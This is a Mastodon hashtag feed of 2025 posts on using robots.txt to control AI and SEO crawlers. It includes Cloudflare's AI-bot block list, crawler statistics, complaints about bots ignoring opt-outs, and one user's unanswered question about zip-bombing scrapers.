Nick Mark, MD @nick

**Jonathan Bailey** @plagiarismtoday@mastodon.world · 6d

Jonathan Bailey @plagiarismtoday@mastodon.world

I asked ChatGPT about the recent copyright news. It rehashed my latest column and misconstrued the facts. But why was it on my site at all?

https://www.plagiarismtoday.com/2025/07/23/chatgpt-ignores-robots-txt-rehashes-my-column/

Plagiarism Today · 6dChatGPT Ignores Robots.txt, Rehashes My ColumnI asked ChatGPT about the recent copyright news. It rehashed my latest column and misconstrued the facts. But why was it on my site at all?

#AI #ChatGPT #OpenAI

**teufelswerk** @teufelswerk@social.tchncs.de · Jul 17

Jul 17

teufelswerk @teufelswerk@social.tchncs.de

Für Website- und Shopbetreiber: Lerne, wie du mit der robots.txt KI-Bots wie GPTBot, ClaudeBot & Google-Extended blockierst – ohne deine SEO-Rankings zu gefährden.

https://teufelswerk.net/ki-zugriff-per-robots-txt-blockieren-so-schuetzt-du-deine-website-ohne-deine-seo-rankings-zu-gefaehrden/

teufelswerk | IT-Sicherheit & Cybersecurity · Jul 17KI-Zugriff per robots.txt blockieren: So schützt du deine Website ohne deine SEO-Rankings zu gefährdenLerne, wie du mit der robots.txt KI-Bots wie GPTBot, ClaudeBot & Google-Extended blockierst – ohne deine SEO-Rankings zu gefährden. Für Website- und

#robotstxt #ki #kibots

**Inautilo** @inautilo@mastodon.social · Jul 4

Jul 4

Inautilo @inautilo@mastodon.social

#Development #Trends
Who’s crawling your site in 2025 · The most active and blocked bots and crawlers https://ilo.im/1652mx

_____
#Bots #Crawlers #Website #Business #SEO #UserAgents #RobotsTxt #WebDev #Frontend #Backend

The Cloudflare Blog · Jul 1From Googlebot to GPTBot: Who’s crawling your site in 2025From May 2024 to May 2025, crawler traffic rose 18%, with GPTBot growing 305% and Googlebot 96%. This blog post explores crawling activity focused on AI and search web crawlers, and how 14% of top domains now use robots.txt rules to manage them.

Continued thread

**George E.** @gme@bofh.social · Jun 12

Jun 12

George E. @gme@bofh.social

Here's #Cloudflare's #robots-txt file:

# Cloudflare Managed Robots.txt to block AI related bots.

User-agent: AI2Bot
Disallow: /

User-agent: Amazonbot
Disallow: /

User-agent: amazon-kendra
Disallow: /

User-agent: anthropic-ai
Disallow: /

User-agent: Applebot
Disallow: /

User-agent: Applebot-Extended
Disallow: /

User-agent: AwarioRssBot
Disallow: /

User-agent: AwarioSmartBot
Disallow: /

User-agent: bigsur.ai
Disallow: /

User-agent: Brightbot
Disallow: /

User-agent: Bytespider
Disallow: /

User-agent: ChatGPT-User
Disallow: /

User-agent: ClaudeBot
Disallow: /

User-agent: Diffbot
Disallow: /

User-agent: DigitalOceanGenAICrawler
Disallow: /

User-agent: DuckAssistBot
Disallow: /

User-agent: FacebookBot
Disallow: /

User-agent: FriendlyCrawler
Disallow: /

User-agent: Google-Extended
Disallow: /

User-agent: GPTBot
Disallow: /

User-agent: iaskspider/2.0
Disallow: /

User-agent: ICC-Crawler
Disallow: /

User-agent: img2dataset
Disallow: /

User-agent: Kangaroo Bot
Disallow: /

User-agent: LinerBot
Disallow: /

User-agent: MachineLearningForPeaceBot
Disallow: /

User-agent: Meltwater
Disallow: /

User-agent: meta-externalagent
Disallow: /

User-agent: meta-externalfetcher
Disallow: /

User-agent: Nicecrawler
Disallow: /

User-agent: OAI-SearchBot
Disallow: /

User-agent: omgili
Disallow: /

User-agent: omgilibot
Disallow: /

User-agent: PanguBot
Disallow: /

User-agent: PerplexityBot
Disallow: /

User-agent: Perplexity-User
Disallow: /

User-agent: PetalBot
Disallow: /

User-agent: PiplBot
Disallow: /

User-agent: QualifiedBot
Disallow: /

User-agent: Scoop.it
Disallow: /

User-agent: Seekr
Disallow: /

User-agent: SemrushBot-OCOB
Disallow: /

User-agent: Sidetrade indexer bot
Disallow: /

User-agent: Timpibot
Disallow: /

User-agent: VelenPublicWebCrawler
Disallow: /

User-agent: Webzio-Extended
Disallow: /

User-agent: YouBot
Disallow: /

#robotstxt

**Inautilo** @inautilo@mastodon.social · May 28

May 28

Inautilo @inautilo@mastodon.social

#Business #Findings
Most blocked SEO bots · Insights from ~140 million websites https://ilo.im/16439x

_____
#SEO #Bots #Crawlers #Content #Website #Blog #RobotsTxt #Development #WebDev #Backend

SEO Blog by Ahrefs · May 22The SEO Bots That ~140 Million Websites Block the MostWe looked at ~140 million websites to see how often SEO bots were blocked.

**Inautilo** @inautilo@mastodon.social · May 24

May 24

Inautilo @inautilo@mastodon.social

#Business #Explorations
What would happen if I blocked big search? · Pros and cons of blocking major search engines https://ilo.im/163yb3

_____
#SearchEngine #SEO #AI #Website #Blog #RobotsTxt #Development #WebDev #Frontend #Backend

Luke's Wild Website · May 16What would happen if I blocked big search?The major search engines are showing slop summaries first and websites second. They link to sites sometimes, but they’d much prefer searchers stay on the results page and ask followup questions. Engagement numbers and all that. These companies run mass content scraping campaigns to train their own slop models and provide servers to other slop companies in the same data centers their crawlers operate from. Every word I’ve thrown into this illustrious publication—the reading of which a total of five people have, at various times, expressed mild enjoyment—has been both silently and explicitly declared fair game by the slop companies. The only positive thing I can egotistically hope to grasp about this development is that a distant and diluted abstraction of my words and thoughts could be subtly influencing the thoughts and decisions of people around the world—the same way a pinch of salt would affect the flavor profile of a large vat at the soup factory, or like the breeze under the wings of chaos theory’s cute and frighteningly powerful butterfly mascot.

**Inautilo** @inautilo@mastodon.social · May 22

May 22

Inautilo @inautilo@mastodon.social

#Development #Findings
Most blocked AI bots · ”Block rates have increased significantly over the past year.” https://ilo.im/16425n

_____
#AI #Bots #Crawlers #Content #Website #Blog #RobotsTxt #WebDev #Backend

SEO Blog by Ahrefs · May 21The AI Bots That ~140 Million Websites Block the MostWe looked at ~140 million websites and our data shows that block rates for AI bots have increased significantly over the past year.

**smeg** @smeg@assortedflotsam.com · May 18

May 18

smeg @smeg@assortedflotsam.com

I've had the robots.txt to block ChatGPT from touching my site in place for months. Yet it's a referrer?

#chatgpt #llm #privacy

**Inautilo** @inautilo@mastodon.social · May 12

May 12

Inautilo @inautilo@mastodon.social

#Business #Guidelines
The Internet Archive opt-out itch · Ways to deal with your public internet history https://ilo.im/163ssx

_____
#InternetArchive #Internet #History #Consent #Trust #Transparency #Content #Blog #Website #RobotsTxt

**Tino Eberl** @tinoeberl@mastodon.online · May 7

May 7

Tino Eberl @tinoeberl@mastodon.online

#Google nutzt Inhalte für das #KI-Training auch dann, wenn Urheber dem widersprechen. Das wurde nun offiziell bestätigt.

Laut Google #Deepmind betrifft der Widerspruch nur bestimmte #Konzernbereiche. Wer seine Daten schützen will, muss die Seite komplett aus der #Google-Suche entfernen. #Verlage und #Webseitenbetreiber sehen sich dadurch wirtschaftlich benachteiligt.

https://www.golem.de/news/kuenstliche-intelligenz-google-trainiert-ki-auch-wenn-urheber-es-nicht-erlauben-2505-195928.html

Golem.de · May 5Künstliche Intelligenz: Google trainiert KI auch, wenn Urheber es nicht erlauben - Golem.deBy Mike Faust

#Urheberrecht #KITraining #Gemini

**rijo** @rijo@frankfurt.social · Mar 31

Mar 31

rijo @rijo@frankfurt.social

Google outlines pathway for robots.txt protocol to evolve https://ppc.land/google-outlines-pathway-for-robots-txt-protocol-to-evolve/ #Google #RobotsTxt #WebCrawlers #SEO #DigitalMarketing

**PPC Land** @ppcland@mastodon.social · Mar 31

Mar 31

PPC Land @ppcland@mastodon.social

Google outlines pathway for robots.txt protocol to evolve: How the 30-year-old web crawler control standard could adopt new functionalities while maintaining its simplicity. https://ppc.land/google-outlines-pathway-for-robots-txt-protocol-to-evolve/ #Google #RobotsTxt #WebCrawlers #SEO #DigitalMarketing

PPC Land · Mar 31Google outlines pathway for robots.txt protocol to evolveHow the 30-year-old web crawler control standard could adopt new functionalities while maintaining its simplicity.

**Inautilo** @inautilo@mastodon.social · Mar 31

Mar 31

Inautilo @inautilo@mastodon.social

#Business #Introductions
Meet LLMs.txt · A proposed standard for AI website content crawling https://ilo.im/16318s

_____
#SEO #GEO #AI #Bots #Crawlers #LlmsTxt #RobotsTxt #Development #WebDev #Backend

**Ross A. Baker** @ross@rossabaker.com · Mar 10

Mar 10

Ross A. Baker @ross@rossabaker.com

Tracked down my Forgejo CPU spikes with pprof: an otherwise acceptable crawler is indexing each commit of my personal weather station data. All 107,980 of them. Blame info, too.

Many Forgejo paths are nonsensical to crawl, even by good bots. Codeberg's robots.txt is a great start for these.

https://codeberg.org/robots.txt

This should both relieve pressure and expose more bad bots.

#Forgejo #RobotsTxt

**Inautilo** @inautilo@mastodon.social · Mar 7

Mar 7

Inautilo @inautilo@mastodon.social

#Development #Reports
Google AI Mode is here · How to access it and control it with robots.txt https://ilo.im/162o8h

_____
#Business #Google #SearchEngine #AnswerEngine #AI #RobotsTxt #WebDev #Frontend #Backend

Search Engine Roundtable · Mar 6Google AI Mode - It's Here - Here Is How To Access ItBy Barry Schwartz

**zeyus ‎** @zeyus@corteximplant.com · Mar 3

Mar 3

zeyus ‎ @zeyus@corteximplant.com

Hey does anyone know if there's still a working zip bomb style exploit that can be deployed on a static site/JS (or as a asset/resource)? Specifically to target web scrapers and AI bullshit? The second any server goes online now it's immediately bombarded by stupid numbers of requests.

#hacking #aislop #crawlers

**Fred** @505fred@mastodon.social · Feb 16

Feb 16

Fred @505fred@mastodon.social

Website owners are fighting back: https://arstechnica.com/tech-policy/2025/01/ai-haters-build-tarpits-to-trap-and-trick-ai-scrapers-that-ignore-robots-txt/

Ars Technica · Jan 28AI haters build tarpits to trap and trick AI scrapers that ignore robots.txtBy Ashley Belanger

#News #AI #AntiAI

**Dawn Tåke** @Tourma@tech.lgbt · Feb 11

Feb 11

Dawn Tåke @Tourma@tech.lgbt

Hi, got a question.

Is there a standard for Anti-AI/Anti-SEO etc robots.txt file? Or a trustworthy site that explains how to build one if prefab isn't available? Is there anything else I should consider?

Thanks.

#AskFedi #TechHelp #RobotsTXT